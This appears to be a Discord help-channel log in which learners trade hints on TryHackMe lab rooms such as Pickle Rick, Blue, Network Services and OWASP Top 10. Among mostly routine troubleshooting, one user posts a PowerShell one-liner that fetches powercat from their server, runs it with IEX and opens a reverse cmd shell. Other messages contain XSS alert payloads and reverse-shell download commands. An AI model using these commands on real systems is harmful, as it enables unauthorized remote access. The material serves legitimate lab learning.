#room-hints

thank you

i think

how can i do that

@tight fulcrum

Check how to scan ports with nmap

let me tell u the problom

Scan and learn what exploit this machine is vulnerable to. Please note that this machine does not respond to ping (ICMP) and may take a few minutes to boot up. This room is not meant to be a boot2root CTF, rather, this is an educational series for complete beginners. Professionals will likely get very little out of this room beyond basic practice as the process here is meant to be beginner-focused. 

i need an nmap command for this question

How many ports are open with a port number under 1000?

@tight fulcrum

That is something you can Google, or take help from Nmap Room.

sudo nmap -p1-1000 -Pn <MACHINE-IP >

Please note that this machine does not respond to ping (ICMP) and may take a few minutes to boot up.

That will not quite work, you are missing something crucial

Hey, doing Linux fundies pt3 and I don't think the shiba4 file exists? doing find / -type f -executable | grep 'shiba4' does nothing neither does find / -type f -name shiba4

!docs verify

Follow those steps, and post a screenshot of what happens when you run the command please

I'm getting nothing other than a permissions error

You are currently using the attackbox

LOL

You are not using a shell on the target machine.

I'm soo out of it

My bad

hahaha oh my days

Sorry about the trouble

Easily sorted

Task 3 - Installing openVAS
Anyone knows how to change credentials for OpenVAS? It is no accepting the default credentials

openVAS
the default credentials to access OpenVAS/GVM: admin and admin

sudo gvmd --version
Greenbone Vulnerability Manager 20.08.1
Manager DB revision 233

hey I am doing Internal room and i have got user flag but to get priv esc we have to abuse this

Internal Jenkins service is running on 172.17.0.2:8080

this is a note i get

how to do port forwarding of this

Hey, use SSH tunneling with the Aubreanna user to gain access to the internal server.

Also look into doing wreath to learn basic pivoting techniques

Wreath is an amazing room. + 💯

Linux fundemantals part 1 :

Step 5 :

I think we are tasked to use the man command to find out how to list a dir in long list

SPOILER however, on the VM, the man ls command, does not return the -l flag

You can scroll in the manual page

What do you mean with the manual page ?

ah hold on, on step 4 ?

man is short for manual

yes, man = manual - Manuals are usually pretty long, you can scroll through them or use the arrow keys

They're also available on the Internet

Well, the man page gives me until flag -d , after that, it gives me the option to press h for help or q to quit

just keep scrolling

the option to quit is always there

oh, needed to use the arrow key !

https://tenor.com/view/dwight-the-office-win-winning-yes-gif-6125847

has anybody been able to successfully OSINT the Mother's maiden name security question in the juice shop website room. could somebody gimme a walkthrough for that part please, you can DM it to me

link the room please?

can anyone hint me on what should I do ? i'm in this room
https://tryhackme.com/room/networkservices
task 4 last question
I got an RSA private key, and it says "Now, use the information you have already gathered to work out the username of the account. Then, use the service and key to log-in to the server."

what do you have so far?

so it was said to investigate the "profiles" share stick in this smb, I logged in with anonymous profile, now I went to the .ssh folder and there are 3 files

id_rsa
id_rsa.pub authorized_keys

so the question before the one i'm stuck on was "This directory contains authentication keys that allow a user to authenticate themselves on, and then access, a server. Which of these keys is most useful to us?" and the answer is id_rsa

so as it's said I downloaded this file

and I have a private rsa key inside

in id_rsa.pub i have this

and for the third file, i don't have the authorisations to download it

so if i understood correctly, I should use this key to find the password, the user being "cactus", log in to it via ssh

and the flag will be inside ?

close the id_rsa key will be used instead of the password

oh i see

and i was looking for ways to decrypt rsa but couldn't understand anything

xd

I dont think the id_rsa key is encrypted

so do you know how to ssh into a box?

yes via the command ssh, i should write ssh cactus@the ip of the box ?

close you need to use cactus id_rsa key too

oh i see

so it's an argument in ssh ?

yes

so you need to ssh using the id_rsa key with cactus@machine io

alright

by the way

there is also an argument for port

i can see -p followed by the port

and on my nmap scan

i had this line

22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)

so should i specify port 22 ?

no ssh will default to port 22

oh i see it's the default port ?

for ssh*

sometimes ssh will be on a different port like say 2222

when its on a port other than 22 you would use the -p flag to specify the port

so to include the id_rsa key you will need to add an argument to yor ssh command

yes I googled and found the -i 🙂 thank you very much

so

can you help me recap ?

it was written

Now, use the information you have already gathered to work out the username of the account

me I downloaded id_rsa.pub although it wasn't specified to do so

and that's where i got cactus@polosmb

so I concluded that the username was cactus

is it the right method ?

yes

ok good 🙂

and can you explain me briefly, since i guess it's complicated, how does the private key worked to bypass the password ?

I can use a private key instead of a password to log in ssh ?

think of the id_rsa 🔑 as a type of password just for ssh

were you able to ssh into the box?

yes i succeed thank you 🙂

ok I understand

I'll do deeper researches on this topic to understand better

It's not too complicated, the private key is supposed to be, well, private, no one else should ever have access to it, it's unique, there's some rooms on cryptography that you'll get to later

ok thanks 🙂

hello world!

which is more difficult blue or ice?

They are the same really

can someone who finished the osquery room give me a hint on the binary padding question

https://attack.mitre.org/techniques/T1027/001/

hey i am doing DailyBugle Room and got a low priv shell as apache user. I have spent almost 2hours now trying to get to the user on the box.Any hints regarding this will be appreciated

Have you checked the usual suspects?

I had already went through that, didn't help me at all in actually answering the question, just looked in the current directory and found a file called notsus

so I pretty much got the question by coincidence

hey can someone help me in (pickle rick ) room

Hey hosam whats up?

I did picklerick how can i help you?

@blazing flame i managed to know the username in the page source code and also the password in the robots.txt , but some how i cant ssh to the machine

ok let me check what i did

also i done gobuster which result in /assets directory

You found the webserver?

yup

There is not only assets

you missed one page with ending .php

you used gobuster?

yes i used it

which options?

but it didint resolve any thing rather that the assets directory

which list did you use

gobuster dir -u URL -t 20 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

Ok so maybe try this:
gobuster dir -u http://<IP>:<PORT>-w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 40 -x php
maybe try also the medium.txt

try another /dirb/common.txt for example

there should be a p*****.php page

oki i will try it

thanks you so much

You should find a login page then

You´re welcome

❤️

Maybe you can help me i struggle with windows powershell and copying of files to the target machine

describe what is the situation ?

I try to upload a reverse shell from my linux machine to a windows machine via powershell with this command:
powershell -c "Invoke-WebRequest -Uri http://10.x.xx.xx/Advanced.exe -OutFile c:\temp\Advanced.exe"

I started a local webserver via python on linux where the Advanced.exe lies

When i execute this on Windows i always get this error:
Unexpected token ')' in expression or statement.
At line:1 char:106

• (new-object System.Net.WebClient).DownloadFile('http://10.X.XX.XX/Advanced.e
  xe','C:\temp\Advanced.exe')) <<<<
  • CategoryInfo : ParserError: ():String) [], ParentContainsErrorR
    ecordException
  • FullyQualifiedErrorId : UnexpectedToken

I think there must be some oneliner out there working i couldn´t find it yet

I already invested two hours into this 😉

powershell -c wget "http://10.x.xx.xx/Advanced.exe" -outfile "c:\temp\Advanced.exe"

i think that worked for me

arth0s thank you so much i try it directly

oh I'm missing some quotes, let me edit

@blazing flame powershell -c wget , i think

Hmm didn´t work:

The term 'wget' is not recognized as the name of a cmdlet, function, script fil
e, or operable program. Check the spelling of the name, or if a path was includ
ed, verify that the path is correct and try again.
At line:1 char:5

• wget <<<< http://10.X.XX.XXX/Advanced.exe -outfile c:\temp\Advanced.exe
  • CategoryInfo : ObjectNotFound: (wget:String) [], CommandNotFoun
    dException
  • FullyQualifiedErrorId : CommandNotFoundException

C:\Program Files (x86)\Jenkins\workspace\project>exit 1
Build step 'Execute Windows batch command' marked build as failure
Finished: FAILURE

Yes i think the quotes are the most important part for this trick to work 😉

welp how is wget not recognised

sorry, someone smarter should chime in

Ok thank you i try harder

because its not a windows comand try curl or Invoke-WebRequest

they already did above, scroll a bit up, but I can't help with why it gives an error

Worked!

I found a working solution

Prepare:
git clone https://github.com/besimorhino/powercat.git
python -m SimpleHTTPServer 80

Then execute on windows:
powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.1.109/powercat.ps1');powercat -c 192.168.1.109 -p 1234 -e cmd"

It executes reverse shell directly in one step is even smarter

Its from this website:
https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/

room https://tryhackme.com/room/investigatingwindows
task 13
help

I've tried everything

how do I identify an attacker's ip?

I haven't done the room yet, looking at it now. Is it a wireshark investigation?

oh, no, I see. hm.

I don't know offhand, but there's gotta be some log file or system even that logged that IP, I would think. Or some artifact the attacker left on the system- a log file or something.

I finally got it

what was it, jusst out of curiosity?

yep, has

I had to locate the hosts file, I didn’t know that windows stored this kind of thing

do it, it's very good, but the last questions are fucking

it does, but it behaves a little differently than linux's, I think. I don't recall details

I didn't quite understand it, but it has something to do with server mapping

yeah, I would need to research it as well

It's pretty much the same for all intents and purposes.

Hi guys, I'm doing the game zone room and at the SSH tunneling part, it says "We can see that a service running on port 10000 is blocked via a firewall rule from the outside (we can see this from the IPtable list)". Can someone please share with me how to see that it's blocked by firewall as it's not explained in the room. Thanks!

you can see them by using the iptables command

iptables --list

iirc

The hosts file on Windows & Linux was essentially the original version of DNS to translate a URL into an IP. It's still there mainly for legacy purposes, but still gets checked first. IIRC what's happened is that the attacker has put his own IP in the hosts file against a legitimate common URL, so when the victim tries to go to Google or whatever, they will divert to the attacker's site.

wow this is great

did you do the room?

hey can anyone help me in reverse engineering room

why does retro not give me any options to open the link

@rich plinth Don't spam the same question over several channels.

then answer

No.

yes

Everyone here is a volunteer. Chill out. Be patient.

well u have time to answer since ur talking to me

-mute @rich plinth 679090627987767308 5m Spamming the same question over a bunch of channels, being rude and impatient when called out. Go take a walk.

🔇 Muted humptydumpty#2648 indefinitely

Whoops

-mute @rich plinth 5m Spamming the same question over a bunch of channels, being rude and impatient when called out. Go take a walk.

🔇 Muted humptydumpty#2648 for 5 minutes

haha now it mutes him/her for 5m then infinitely

You may notice that the first time, I had mention then ID which doesn't work

ah

In the new linuxfundamentals3 - question about crontab, it asks "how frequently does this crontab run". There is only one cronJOB in the crontab file and it is running on ||bootup||. This is however not accepted (or matching the format)

any hints

If you still need a hint use crontab -e.

yes I did. I has a single line

but not one that would make sense for this question

You should see this line at the bottom. I think you can guess the other 4 letters.

yes

I inputted that and no luck

It's a other word for restart.

yeah I know the word 🙂

I tried it but it did not like it.

also tried variations of that word

but now I just tried again and now it accepted it

so not sure what happened

Well at least you solved it

now I just need to figure out how to read the log files when I am not in the adm group and the permissions are not in my favour 🙂

Make sure to read the correct file. There is access.log and access.log.1

yeah I just realized that

but that is not really obvious from the text

Nice rooms LinuxBasics Module.. I learnt a few new things and I'm sure I wasn't the only one. thanks THM Crew.

guys the file name isnt appearing , doing room advent of cyber 2 task 7 day 2 while uploading the file i even renamed to jpg.php idk what am i doing wrong

where is it not showing up ie on the web site after upload or before upload when you select browse

oh wait I looked closer at your screen shot on the bottom right of the browse file window change to all files

https://tryhackme.com/room/basicpentestingjt
I'm like 90% sure I'm supposed to use enum4linux, I'm using the -a flag and the only username I'm finding is "BASIC2" which is not an accepted answer for this CTF. Am I somewhat on the right track?

Hi, i am trying to redo new Linux part3 room as they have recently came out and to get certificate you need to do them again and i am stuck on log section for Linux Fun part3 and i need to check log apache2 logs, but looks like ssh tryhackme user don't have access to the logs, does this looks like i have to change access on standart user in order to check logs ?
[12:07 AM]

[12:07 AM]

[12:08 AM]
and i guess the information what i need to get is on access.log or i am doing something wrong here ?

check the .1 log

they are open to all users

glad I'm not the only person who went... wait, i don't need to privesc this do i?

isn't that the screenshot from the room

you're looking for the crontab on the deployed machine

hy gusy

hy guys

how to crack password smb on room basic pentesting

i alredly use hydra but any error

Hi, no if you check permission for all files you will understand which you can cat out

Can I get a hint please for the **Osquery **> Task 5 - Creating queries question - What is the query to show the username field from the users table where the username is 3 characters long and ends with 'en'? (use single quotes in your answer) ?

So far I have the query of SELECT username FROM users WHERE username

I don't know what last 2 commands I need to put in to answer the question

I went through the documentation and Googling it but still empty handed.

Take a look at this, might be helpful: https://stackoverflow.com/questions/15324012/sql-how-to-select-words-with-certain-values-at-the-end-of-word

anyone that i can dm on overpass3?

hi i'm doing again the "Linux Fundamentals Part 3" but the last part (task8) is asking us to read the logs but we don't have the permissions, did I missed something ?

Your reading the wrong file.

but the hint tells us that it's in the "/var/log/apache2" directory

There are 2 files. 1 has read permissions, the other don't

I just write wrong the name of the file bruh

Hello. I just finished exploiting NFS for room "Network Services 2". Found the flag. Need some clarification on one of the answers. Is this the right room to ask? Thanks for reading 🙂

If it is not, which room can I go to?

you can try here I guess, or infosec general

this should be fine however

Ok. I will post here.

For Room "Network Servieces 2", Exploiting NFS section: One of the tasks mention that the bash needs to ends with -sr-x. Questions is why need to set s for "group" and x for "others"? I though setting s for "user" will be enough.

you are looking at file permissions

not 'bash' exactly

i tried everytime, always, atreboot,...

i dont know what to answer here

did you try copy paste

ooh thanks

(or just type it as written)

lol i didnt think of it

hah hah

Yes. What I mean is why the bash file needs to set to -rwsr-sr-x? Why not -rwsr--r--?

did you try it without? I believe it's because you are using it to elevate to root or something right?

I don't recall that room intimately maybe someone else can answer but I believe 'others' need the execute bit set so that you can use it in the way the room wnts

you can always restart it and try again

and test it out to learn more

Ya. Need to escalate to root. Good idea. I will try some other day not setting the execute bit for group and others.

Just clarifying my understanding because it was specified to set the executable bits.

Anyway, thanks @silver otter 🙂

Gave +1 Rep to @silver otter

np

I think you are correct you set +x so everyone can execute it and you set the +s so it is executed with the owner and group privileges

Thanks. That helped. I answered the question.

Gave +1 Rep to @halcyon sequoia

Hello, I'm at "scripting": https://tryhackme.com/room/scripting, but I'm having trouble with the sync. I don't fully understand the instructions
All ports change at once every 4 seconds (I mean, I only have 4 seconds to reach the last one)? I can only get to the 3rd hop max

...And then I can't reach the next port

Or they flip/flop like traffic lights?

Thanks

Gave +1 Rep to @pure thistle

was that what you were needing

Ok, I'm trying to do the new autopsy room, and I'm stuck on the full name printed on desktop wallpaper. am i right in looking in Windows/Web for the wallpapers? Each time i try to export an image it comes out as 0 bytes

Could also do with a hint on how to see the first flag of the changed file. I know what file it is, but viewing it in the timeline thing doesn't seem to tell me what i need?

I haven't done that one yet, but new rooms get their own discord channel for a bit. Maybe try the #844288495165898796 room

ah cool, thanks

Gave +1 Rep to @worn otter

In the OWASP Top 10 Room - Task 21 - Who developed the Tomcat application? - It is not taking the guys name. Even with a The at the beginning? Any ideas?

Try the organisation

Thanks.

Gave +1 Rep to @pallid moss

I only remember that one because i got stuck in the same way for a while 😄

Hi, i'm on the webOSINT room and i can't get the country right, the address suggests the domain was registered in ||iceland|| but the answer is only 6 characters long, can anyone help?

It has changed.

yeah i suspected it could've, I'll ignore that then

thanks for the help

someone can give me a help with the network services 1 room? I'm stuck on the telnet section

im trying in that part where i should ping myself but nothing comes on the listening port

did you use .RUN <your command>?

yes

Make sure you're using the correct ip

im using vpn the local thm ip is the one that show on the green thing on the top of the page right?

Yea

i tried using the tcpdump in the tun0 and eth0

none of them work :c

Depends on what you're using. If you're using your VM then you need to use tun0

Could you verify and send a screenshot?

!docs verify

no im connected trought vpn

1 sec

a screenshot from the terminal?

Yea you should have 2

i have 3 because vpn

tbf this seems correct

Try to redeploy and try again

Make sure you deploy the machine in task 6

ok i will try

does anyone have the answer for question 2 of task 6 in the linuxfundamentals part3?

crontab -l you'll see it at the bottom

inside the machine it seems the crontab runs each 17 minutes of every hr

it worked @tight fulcrum thanks bro

Gave +1 Rep to @tight fulcrum

found it thanks

Gave +1 Rep to @tight fulcrum

whats the difference between the contents in the /etc/crontab and crontab -l

afaik /etc/crontab is a systemwide crontab while crontab -l is a user crontab.

thank you sir

Gave +1 Rep to @tight fulcrum

i'm trying to re-do the linux fundamentals room since it was redone, and i can't figure out what Task 5 (Processes 101) question 4 is asking about

"Locate the process that is running on the deployed instance. What flag is given?" I can't figure out which process I'm supposed to be finding

oh...i think i finally found it haha, not sure how i didn't notice that my first several times going through the list of processes

I think I need a hint. Rick and Morty room, final ingredient. Is it located in the /root directory? If not where should I be looking?

from what I remember, it should be in root, yeah

cool thank you

Gave +1 Rep to @forest drift

now to work out how to get in there lol

I think there was several ways, you'll figure it out

I hope so, I kinda just fell onto the second ingredient

i'm in the exploiting telnet section of the network services room, and i'm not seeing anything happen when i try to ping my local IP address from the telnet server

i used ".RUN ping 0.0.0.0 -c 1" from the telnet (replace 0.0.0.0 with my IP address) and nothing seems to happen

the local IP you are using is it the tun0 ip?

i don't really know what that means, but i was using the wrong local IP

although i don't really understand the difference

i was able to find the correct ip address using ifconfig, which some googling recommended

figured it out. Should have tried the easiest things first........ fml lol

haha good to hear, you probably learn something new though

I did I did. Not going to overlook that ever again. Thank you for the support.

Gave +1 Rep to @forest drift

no problem

Hello guys, any hint on SafeZone?

Hi all, making task 6 in network services room, and it says I have to make nmap -A -p- ip, but it takes too long and never get the scan, I've tried to search google, man, help everywhere, but none result, can you give me some support?

It is scanning for all the ports, it takes time to complete. Just run it without -A flag. You can use -A on the open ports later.

perfect, thanks a lot 🙂

Gave +1 Rep to @gusty turtle

im doing the dogcat room and i figured how to triger an error with a nullbyte but dont have an idea on how to exploit the LFI,

i read just a peak of a write up and someone said they found out that by doing the get reqests there are two php files that gets called dog.php and cat.php and im still trying to found out how to enumerate to find those files.

i used both chromium and firefox to check the source as well as burpsuite to intercept the requests.

what am i not doing here?

maybe a gobuster with a filetype extension?

Hi, I am stuck on trying to get a shell in the room 'Chill Hack'. I am doing the || command injection filter bypass using base64 encoding and decoding. I tried reverse shells using nc, python3, php, socat and bash, but none seems to work||. Could I get a hint pls?

Introductory Researching: Task 3 Vulnerability Searching

I can't seem to get the answer or have anything come up on the exploit database.. TIA (:

Not really sure what to tell ya there, it's pretty self explanatory tbh. Maybe try using the advanced search in the upper right hand corner on exploit-db.com

yeah i assumed so i just wasn’t getting any search results even typing the same thing in👍🏻

Clear cookies and refresh

See if that works

guys i am doing room blue and i am at this , and when i open backgroud sessions it gets stuck sometimes

Please don't ask the same question over multiple channels

Yeah, I asked in #room-help for a screenshot of the error

But you missed the space.

dot space dot backslash

anyone finished the "in a cave" room recently ?

@woven mirage time for a quick question regarding the "in a cave" room?

Hello! 🙂

see DM

need hint for osquery task 9 question 2 what table am i suppose to query for security agent

Iirc it's a program

ummm what???????

not finding a table called Iirc or program????

iirc

It's a standard abbreviation.

Should be a program table, unless it's changed since I did it

can any one help me with this question :

Room osquery

anyone got a hint on where I can find the task 3 user.txt flag thing?

in the rootme room

I'm at the stage where I did the reverse shell thing

SUID binaries are always a nice place to start with

Network Services Task 7: Exploting Telnet

started listening on port 4444 on local machine, but copying and pasting ".RUN" command / or payload into telnet session still returns "?Inactive command"

can you verify and post a screenshot?

!docs verify

sure, stand by

done!

I suspect you may have accidentally killed the telnet session

well i have idled out of it just now if that's what you mean lol

but do you mean as to why I'm getting the terror?

just reconnect

error*

but it's also easy to kill the session accidentally

okay cool

thanks for the help!

I was about to ask the same question, as I am running into the same issue. Once I try to run the payload on TELNET, I don't get any feedback on the nc listening..

@ripe hedge thank you for the help! I reconnected the telnet session and it worked fine

Gave +1 Rep to @ripe hedge

👍

How ti reboot a machine on tryhackme

I mean you just terminate it and start it again

Get root, type reboot.

Terminate and redeploy lets you totally reset the box, but that's not a reboot

Ah, that kind of reboot

Ok thanks

For OWASP Top 10, Task 5, "What is the user's shell set as?" I don't really understand the question or how to get the answer. Is ps -ef the right command to look thru the output for?

No, it is not

I think the wording is tripping me up, are they asking for the type of shell running or the working directory or what?

The user's default shell, which will be used when they log in to the system.

so if it was bash, they're looking for /x/y/bash

i'll give u a hint 🙂
/***/******

The full path

This information is stored in an important file on Linux systems

aha thanks

Hey guys, I'm doing the pickle rick room thing rn and I've gained access to the command panel and I have the first ingredient but I have no idea what I can do next, can anyone just point me in the direction of what I should be doing? (I'm not looking for a direct answer what to do exactly, just a little hint)

For the second one: Just dig around in the filesystem, common places for flags. have also a look on the texts and warnings u get

Hey lovely people. I'm on the complete beginner path and am up to the section in network services on enumerating and exploiting telnet. I have found the right port and connected to telnet, and I have used the provided msfvenom command to generate a "reverse shell payload" (still learning the terminology, sorry for being such a noob) and now need to "copy and paste our msfvenom payload into the telnet session and run it as a command." - This part has stumped me. Does msfvenom generate some kind of file that I need to upload to the target machine somehow via telnet? Am I heading in the right direction here? Would love a hint. Thanks for your time

did you get an output when you ran the msfvenom command?

@silver otter Yes, but I don't understand it.

well, you can choose to google all the functions of it to understand why it works if you want

or you can just use it because, it's a tool that generates payloads

Wait are you telling me that I literally copy and paste the output text and run it in telnet

I didn't even think of that, I figured it would need to be much more complex. That's crazy, thank you.

"Great! Now that's running, we need to copy and paste our msfvenom payload into the telnet session and run it as a command. Hopefully- this will give us a shell on the target machine!"

the room says that so I figure yes

and no problem, msfvenom has a lot of uses and is very cool

Yeah I guess I figured a payload would be a file or something, rather than just a string of text. That's terrifying and very cool, I'm going to go and read up on how on earth that works. Appreciate your time.

Hi. For OWASP Top 10, Task 20 last question, Change "XSS Playground" to "I am a hacker", do I expect a pop up for the flag?

I got nothing. So I am wondering if it is a room bug

Or do I need to look for the flag after I have successfully changed the text?

Never mind. I found it. Thanks.

I have used
Exploit/windows/smb/ms17_010_eternalblue
Exploit in the blue machine
Set the RHOSTS to the machine ip
But I am not getting any meterpreter session
Where I am going wrong?

Have you set Lhost to your IP address?
If you are in your VM: try: set Lhost tun0
If you are in the attack box: try: set Lhost eth0
@elfin night

Trying to do new room linux server, can somebody give a hint on this , where i can find such a info ?

Found it 😄

I am not able to get in the system root in the blue machine

Someone help me please

This is a Windows machine. There is not the directory root. The flag must be somwhere else.

Can I dm you here I don't have access to attach pics, please?

!docs verify

Verify your account. Then you can send a screenshot.

It's saying the flag is in system root?

I am not shure but try to get in the System of the machine.(Drive C)

Got there but there is no flag located there is a flag1.txt in the C but that's not the flag required.
I am not getting it:pleading_face:

Can you send a screenshot of your terminal?

Maybe you must decode the flag.

did you try to read the flag1.txt file using the type command?

I remember that the content of flag1.txt is the first flag, and it does not require decoding anything

No I got the flag by cat flag1.txt

Then submitted it and it was wrong

How does it look like?

Access_the_machine it was if I remember correctly

that is correct, but as Noctrise says, you need to respect the format...

Ooh haven't tried this
Wait I will try and let u know
Thanks for help

Yaa that also the thing

So don't thing flag{} will work

Any other suggestions 🥺

Are you still stucked at flag1..? because it's literally copy/paste content of it

I did but it's not working

.

It's saying the flag is in system root and I am not getting there..!

That's the root of the system

not the root user

Got into that got the flag1.txt also there

But when I am submitting it it's saying wrong flag

access_the_machine it was if I remember correctly

I don't understand why you used cat, did you download flag1.txt to your machine?

if you're in meterpreter there's no type

No cat is used just to display the content in it

so you didn't launch a shell?

Yaa correct

Yaa I got the meterpreter

There only I got the flag

But I am submitting it it's saying wrong flag

flag{content}

that's the format

and as Noctrise said, it's just copying the content (which includes flag{} if you pay attention)

Got it thanks so much😀

Gave +1 Rep to @brave vale

gj

if you play with the dir command you will be able to find them all without searching... if you launch a shell on the Windows system

Can some one give me a suggestion. Im doing owasp 10 task 9 and i cant seem to download the webapp.db
[11:09 AM]
or at least the file is saying 0 bytes. when i try to open it with sqlite3 the .tables command yields no results
[11:10 AM]
└─$ sqlite3 webapp.db
SQLite version 3.33.0 2020-08-14 13:23:32
Enter ".help" for usage hints.
sqlite> .tables
sqlite> .tables
sqlite>

how did you download webapp.db?

i did this yesterday @random depot

I'm working on the IDOR challenge from that same room. I'm not sure I'm on the right path. I'm using burp intruder to iterate through the note.php?note="n" to find other notes, but it doesn't seem to be returning any results after trying 2-270ish. Am I utilizing the correct tool?

the burp ce intruder tool is definitely slow moving, I'm wondering if it would be faster to just write a python script.

Start at 0

ooooohhhhh man, thankyou. i just did 2-1000

I think I need a hint for the OWASP Top 10: Task 19. Security Misconfiguration using default credentials. The hint on the task suggests looking at the webapp's source code, then looking at the documentation. Should I be looking at main.js?

Try some research about the webapp

I can't reply because discord is ded but that's not the webapp source code @hidden hearth

ok, i also ran a nmap scan and figured out ||golang net/http server|| is running

That won't help you that much

ah, gotcha

oof, i didn't search for the literal name of it. i just figured it was some mock webapp and was worried if i searched for it, it would just be some random dude's guide to this task with spoilers.

i did learn more about burp intruder in the process though. Thanks!

I mean it's a fully functional notes application, developed by yours truly

nice! Yeah, i didn't think to check it's actual name

click through the slide show

give me hints

task 2 has a different page

the amount of money someone got paid for reporting an instragram issue isn't the same as how much money a breach cost target

@quick lintel Don't post the same question over multiple channels

click "View Site" for task 2

and

you should get a different slide show to read through

means we can attack on which have bulit-in pc

could someone give me a hint for the Security Misconfiguration challenge in the owasptop10 room?

i've inspected the html and read the js source code, but i think i must be missing something

reading login.js i was able to see that if i set a cookie called SessionToken that had a non-empty value, it would treat me as though i were logged in, but that's basically just treating me as a ghost user. i assume i need to log in with default credentials that i find somewhere, but i'm out of ideas

You've looked at the clientside source code

Try to find the rest of it.

ah ok

i've got some ideas of things to try, but they all feel like rabbit holes, but i'm not really sure what the room is intending for me to do

like, i scanned for open ports and see they have ssh, so i thought maybe try default anonymous or admin credentials to ssh in, but then at that point i'm not even dealing with the web app anymore

Try to find the rest of the source code for the webapp. Maybe google the name of the webapp? That'd be a good way to find information about it.

thanks. i was totally focused on trying to find the source code from the web app itself, didn't even think about osint

Was going to ask for a hint but I hesitated for a moment. The words "try harder" came to mind and ended up solving the task. Thanks for being an awesome community. 👍

thanks for the hint. i don't think i ever would have gotten there without it haha. just found the flag

Gave +1 Rep to @stuck fractal

on task 29 of the owasptop10 room, i've searched discord and seen a few other people ask but they didn't get answered. i'm trying to change the payload of the exploit, and i've tried ||exec(), system(), passthru(), popen(), proc_open(), and pcntl_exec() to replace shell_exec()||, but i'm not making any progress and i don't know of any other ways to ||execute shell commands from php||

I'm stuck in exactly the same spot @past canopy , would also love a hint.

You want to ask that why we must use shell_exec to get reverse shell, right?

When you run the exploit, look carefully where it says "Web shell uploaded to"...

It is not necessary to modify the exploit code to complete the task.

@brave vale got it, thank you

Gave +1 Rep to @brave vale

need help in a task

Don't ask the same question over a bunch of channels. It's spam.

In room "Intro PoC Scripting" task 3 ,can anyone help with this question

"In the check function, what is it doing to the cookies?

Can anybody hep me i am getting this error?

looks like your syntax is wrong it says its not finding wordlist

need something like wfuzz -z file,/path/to/wordlist.file http: ect,ect..

hey guys I need help

ask ur question someone will pick it

the question is "Netcat is a basic tool used to manually send and receive network requests.
What command would you use to start netcat in listen mode, using port 12345?" I did this command man netcat and tried to search in the manual page but I m lost

What’s the command you’re trying?

there is too many commands and idk which one should I use

https://linux.die.net/man/1/nc

Check out the examples here. You’ll want to use -l and -p

I tried to use them but he keep telling me undfined

I m stuck in this question for more than an hour

Please share the command you are typing

@white salmon take some time and read the man page or the above given like is a goldmine for ur concern
-l for listening -p for specifying port

that's what I did

sharing room name and task number will be more clear

room name : Introductory Researching
task 4 last question

well what is the command u enter, can u say it here

that's what I m doing Idk if it's wrong or right "-l -p 12345"

so u are using netcat then u need to use
nc command before the flags

so this what I should type " nc -l -p 12345 "

yes

give it a try

ok

it still says undefined

what u are trying to answer the question right

task 4 last question

yeah

u mean this error msg

undefined and incorrect are different errors

undefined usually means your antivirus is breaking things

no it says " uh-oh undefined "

oh i haven`t faced that error ^

what does that mean ?

well im help less ask james

It means your antivirus is breaking things...

I don't understand but how to solve this error

Add tryhackme.com as an exception in your antivirus

I m not using an antivirus but I m using ad blocker

well I fixed the problem it was bc I verfied the e mail while doing the quetions

Thanks!

Gave +1 Rep to @foggy cliff

Thanks!

I'm doing the "relevant" room and am stuck on this last step for privesc and getting this error. Does anyone know how to resolve it?

could anyone help me to resolve the first blood challenge "hack the box" ?

enjloezz

Actually, i found the loopholes which is contact.php file but not able view the content

I am doing the new linux forensics room ,In task 3 Q3 it says Who left an exposed security notice on the server? and hint says that it will be in requests made by dirbuster so i grepped all the requests by DirBuster but cant seem to find the answer to this?

first see if windows is 32bit or 64. Then use printspoofer for that bit version

hi, i need a little help I'm currently playing the "Different CTF" room and i already have root access but i can't find the web flag

The root flag is hidden in something

oh i already have the root flag but i can't find the web flag

Oh sorry misread that

It should be in the /var/www/html directory

i found it thanks

Gave +1 Rep to @astral smelt

Hello everyone, I'm stuck on Network Services 2 at Task 3 : Enumerating NFS
With this question : Now, use /usr/sbin/showmount -e [IP] to list the NFS shares, what is the name of the visible share?

Someone can help me ? 🧐

Ok, it tells you what to do so what's the problem?

If you're asking for help, please ask your question directly

No one knows if they can help until you ask your actual question

use /usr/sbin/showmount -e 10.10.x.x
But it isn't working

/usr/sbin/showmount -e 10.10.x.x

isn't working too

nfs-common /usr/sbin/showmount -e 10.10.x.x

isn't working too

statd too

isn't working is incredibly vague. Please elaborate.

Show us the error

I don't understand what am i supposed to use

Remove the path, just use showmount as a command.

hum

okay

@steady stratus Can you either edit Network Services (2?) NFS, or add a symlink so that it works? Bunch of people have this problem

OKayyyyy

it's working fine

I had seen the "showmount" in the commands but I didn't understand how to execute the right command.

due to /usr/sbin/showmount

So, thank you 🙂

Gave +1 Rep to @stuck fractal

I am solving watcher room from tryhackme .I tried directory bruteforcing with different wordlists but didnt got much.Found robots.txt which gave me first flag and a .txt file which is forbiiden to access.I am kinda struck now.Any nudges would be highly appreciated.https://tryhackme.com/room/watcher

I did not compile it myself. Used the https://github.com/dievus/printspoofer link which provided the exe file. I used wget to download the file. Could that be the issue?

yes , i wget some scripts and they were corrupted

so just manually download the binaries from browser

I did do a direct download previously but the file became a 0 byte text file.

So kind of not sure what to do.

wait

https://github.com/itm4n/PrintSpoofer/releases/tag/v1.0

here

32bit 64bit

I had to guess at that one wasn't finding it with grep

room : Investigating windows 3
Q. This is the default communication profile the agent used to connect to the attack machine. What attack framework was used? What is the name of the variable? (answer, answer)

Thanks for your help!

Gave +1 Rep to @sweet ferry

I'm working on the OWASP Top 10 room, Task 20, Question 5 On the same page, create an alert popup box appear on the page with your document cookies. I've tried a number of scripts that all produce the same cookie data. <script>alert(“document.cookie”)</script>
<script>onclick(alert("document.cookie"));</script>
var x = document.cookie; window.alert(x);
I get a popup with connect.sid=s%3Alc0.... Clicking ok gives another popup with document.cookie. Clicking ok then just closes the dialog without showing another popup with the flag or updating the page to show a flag like it did for the previous stored XSS question. Is this a program error, or am I missing something?
Any help would be appreciated. Thanks.

hi all, trying to make the network services 2, task 3, but when I try this I get an error message, something about permissions

I don't know what else can I try...

It's not called share

yes, it is /home, but it doesn't work anyway

Reboot the target

It mounted successfully

yes, but it is supposed to have one aditional directory that it isn't appearing

Redeploy the target machine.

ok, I'll try

now it seems to be stoped....

